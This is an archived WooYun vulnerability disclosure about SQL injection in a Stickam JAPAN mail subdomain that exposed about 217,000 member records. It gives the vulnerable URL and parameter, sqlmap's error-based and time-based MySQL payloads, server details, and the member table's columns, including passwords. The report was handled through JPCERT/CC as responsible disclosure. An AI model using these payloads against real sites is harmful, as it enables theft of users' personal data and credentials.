当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0183556

漏洞标题:Stickam JAPAN某分站存在SQL注入涉及近22W用户详细信息含密码

相关厂商:Stickam JAPAN

漏洞作者: 西西

提交时间:2016-03-12 09:32

修复时间:2016-04-28 14:58

公开时间:2016-04-28 14:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(日本国家互联网应急中心(JPCERT/CC))处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-12: 细节已通知厂商并且等待厂商处理中
2016-03-14: 厂商已经确认,细节仅向厂商公开
2016-03-24: 细节向核心白帽子及相关领域专家公开
2016-04-03: 细节向普通白帽子公开
2016-04-13: 细节向实习白帽子公开
2016-04-28: 细节向公众公开

简要描述:

Stickam JAPAN某分站存在SQL注入涉及近22W用户详细信息含密码

详细说明:

Stickam JAPAN某分站存在SQL注入涉及近22W用户详细信息含密码

漏洞证明:

注入点

http://mail.stickam.jp/_bcn?id=member


注入证明

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=member' AND (SELECT 4727 FROM(SELECT COUNT(*),CONCAT(0x3a726e743
a,(SELECT (CASE WHEN (4727=4727) THEN 1 ELSE 0 END)),0x3a7166763a,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'uitP'='uitP
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=member' AND SLEEP(5) AND 'DTBh'='DTBh
---
[21:02:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3
back-end DBMS: MySQL 5.0
[21:02:08] [WARNING] reflective value(s) found and filtering out
[21:02:08] [INFO] retrieved: 217464
Database: msdb
+----------------+---------+
| Table | Entries |
+----------------+---------+
| ms_user_member | 217464 |
+----------------+---------+


泄露内容包含

Database: msdb
Table: ms_user_member
[47 columns]
+---------------------+--------------+
| Column | Type |
+---------------------+--------------+
| Account_not_exists | int(11) |
| active | tinyint(4) |
| attri_1 | int(11) |
| attri_2 | int(11) |
| attri_3 | int(11) |
| attri_4 | int(11) |
| attri_5 | int(11) |
| attri_6 | int(11) |
| attri_7 | int(11) |
| attri_8 | int(11) |
| attri_9 | int(11) |
| Authen_error | int(11) |
| Auto_return | int(11) |
| birth | date |
| child | tinyint(4) |
| clicks | int(11) |
| Connection_timeout | int(11) |
| email | varchar(255) |
| entry | date |
| Host_not_exists | int(11) |
| house | tinyint(4) |
| interest | varchar(255) |
| job | tinyint(4) |
| live_1 | tinyint(4) |
| live_2 | varchar(255) |
| Mailbox_unavailable | int(11) |
| marr | tinyint(4) |
| name | varchar(255) |
| next_story | int(11) |
| no | int(11) |
| no_crypt | varchar(255) |
| opens | int(11) |
| Other | int(11) |
| pet | tinyint(4) |
| pet_kind | varchar(255) |
| phone | varchar(16) |
| points | int(11) |
| postal | varchar(8) |
| regist_from | varchar(16) |
| regist_mode | tinyint(4) |
| Server_error | int(11) |
| sex | tinyint(4) |
| sports | varchar(255) |
| trouble | varchar(255) |
| udevice | tinyint(4) |
| uid | varchar(255) |
| upwd | varchar(255) |
+---------------------+--------------+

修复方案:

502

版权声明:转载请注明来源 西西@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-03-14 14:58

厂商回复:

最新状态:

2016-03-14:Hello 西西.This is JPCERT/CC.Thank you for your information.We will notify this information to site administrator.